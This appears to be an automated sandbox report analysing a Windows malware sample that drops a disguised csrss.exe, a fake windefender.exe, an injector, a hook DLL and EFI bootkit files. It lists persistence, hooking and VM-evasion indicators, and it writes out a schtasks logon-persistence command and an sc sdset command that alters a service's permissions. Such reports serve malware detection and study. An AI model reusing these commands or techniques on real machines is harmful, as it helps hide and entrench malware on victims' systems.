Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\rss\csrss.exe Code function: 11_3_119322AA pushad ; ret 11_3_119322C9
PE file contains sections with non-standard names
Source: 0NlSa5bf55.exe Static PE information: section name: UPX2
Source: upd.exe.0.dr Static PE information: section name: UPX2
Source: csrss.exe.8.dr Static PE information: section name: UPX2
Source: injector.exe.11.dr Static PE information: section name: _RDATA
Source: windefender.exe.11.dr Static PE information: section name: UPX2
Source: bootmgfw.efi.11.dr Static PE information: section name: .xdata
Source: bootx64.efi.11.dr Static PE information: section name: .xdata
Source: EfiGuardDxe.efi.11.dr Static PE information: section name: .xdata
Source: NtQuerySystemInformationHook.dll.11.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: EfiGuardDxe.efi.11.dr Static PE information: real checksum: 0x4a5a6 should be: 0x51a75
Source: csrss.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x3a37d7
Source: bootmgfw.efi.11.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: bootx64.efi.11.dr Static PE information: real checksum: 0x2199 should be: 0x4c78
Source: injector.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x54ea2
Source: windefender.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x20ae45
Source: 0NlSa5bf55.exe Static PE information: real checksum: 0x0 should be: 0x20add5
Source: upd.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x3a37d7
Source: NtQuerySystemInformationHook.dll.11.dr Static PE information: real checksum: 0x0 should be: 0x2279d
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\upd.exe Executable created and started: C:\Windows\rss\csrss.exe Jump to behavior
Source: unknown Executable created and started: C:\Windows\windefender.exe
Drops PE files with benign system names
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\0NlSa5bf55.exe File created: C:\Users\user\Desktop\upd.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Boot\old.efi (copy) Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Jump to dropped file
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: B:\EFI\Microsoft\Boot\fw.efi (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\upd.exe File created: C:\Windows\rss\csrss.exe Jump to dropped file
Source: C:\Windows\rss\csrss.exe File created: C:\Windows\windefender.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

Hooking and other Techniques for Hiding and Protection:

barindex
May modify the system service descriptor table (often done to hook functions)
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\upd.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\upd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\upd.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\upd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: upd.exe, csrss.exe Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
Source: upd.exe, csrss.exe Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6648 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 752 Thread sleep time: -59000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy) Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi Jump to dropped file
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy) Jump to dropped file
Is looking for software installed on the system
Source: C:\Windows\rss\csrss.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\rss\csrss.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\windefender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 36_2_00007FF7019D5C10
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 74a95330c532692c7cf7a70ce16db670, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 962ff8519dbe320490c8b5e46ae96eb5, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe Binary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current State: Default, new state: Off, RemovePayload: 0
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsmb startsnowflakesparklingsucceededtask %+v
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a39411adbcba7770488faca4732df809, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: csrss.exe Binary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
Source: csrss.exe Binary or memory string: epslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DY
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, Applicable: NeedsParent, Disposition: Staged
